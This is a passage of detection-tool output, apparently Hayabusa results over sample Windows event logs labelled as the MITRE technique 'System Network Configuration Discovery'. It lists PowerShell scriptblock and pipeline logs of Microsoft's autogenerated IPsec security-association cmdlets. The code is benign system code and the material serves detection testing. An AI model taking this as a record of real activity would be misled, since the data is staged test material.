PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetQuickModeSA"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetIPsecQuickModeSA</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Name"" CmdletParameterSets=""ByName"" IsMandatory=""true"" Position=""0"" Aliases=""ID""/> </RegularQuery> </Property> </QueryableProperties> <QueryableAssociations> <Association Association=""MSFT_NetSAAssociation"" ResultRole=""Dependent"" SourceRole=""Antecedent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecMainModeSA"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecMainModeSA""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Remove"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:DeleteInstance""/> </Cmdlet> </InstanceCmdlets> </Class> <Enums> <Enum EnumName=""NetSecurity.IPsecMode"" UnderlyingType=""uint16""> <Value Name=""None"" Value=""0""/> <Value Name=""Transport"" Value=""3""/> <Value Name=""Tunnel"" Value=""2""/> </Enum> <Enum EnumName=""NetSecurity.QmSATransformType"" UnderlyingType=""uint32""> <Value Name=""None"" Value=""0""/> <Value Name=""Ah"" Value=""1""/> <Value Name=""EspAuth"" Value=""2""/> <Value Name=""EspCipher"" Value=""3""/> <Value Name=""EspAuthAndCipher"" Value=""4""/> <Value Name=""EspAuthFirewall"" Value=""5""/> </Enum> <Enum EnumName=""NetSecurity.QmBundleFlags"" UnderlyingType=""uint32"" BitwiseFlags=""true""> <Value Name=""None"" Value=""0""/> <Value Name=""NdSecure"" Value=""1""/> <Value Name=""NdBoundary"" Value=""2""/> <Value Name=""NdpeerNatBoundary"" Value=""4""/> <Value Name=""GuaranteeEncryption"" Value=""8""/> <Value Name=""NLB"" Value=""16""/> <Value Name=""NoMachineLuidVerify"" Value=""32""/> <Value Name=""NoImpersonationLuidVerify"" Value=""64""/> <Value Name=""NoExplicitCredMatch"" Value=""128""/> <Value Name=""Unknown256"" Value=""256""/> <Value Name=""AllowNullTargetNameMatch"" Value=""512""/> <Value Name=""ClearDfOnTunnel"" Value=""1024""/> <Value Name=""AssumeUdpContextOutbound"" Value=""2048""/> <Value Name=""NdPeerBoundary"" Value=""4096""/> <Value Name=""SuppressDuplicateDeletion"" Value=""8192""/> <Value Name=""PeerSupportsGuaranteeEncryption"" Value=""16384""/> <Value Name=""ForceInboundConnections"" Value=""32768""/> <Value Name=""ForceOutboundConnections"" Value=""65536""/> <Value Name=""ForwardPathInitiator"" Value=""131072""/> <Value Name=""EnableOptionalAsymmetricIdle"" Value=""262144""/> <Value Name=""UsingDictatedKeys"" Value=""524288""/> <Value Name=""LocallyDictatedKeys"" Value=""1048576""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') 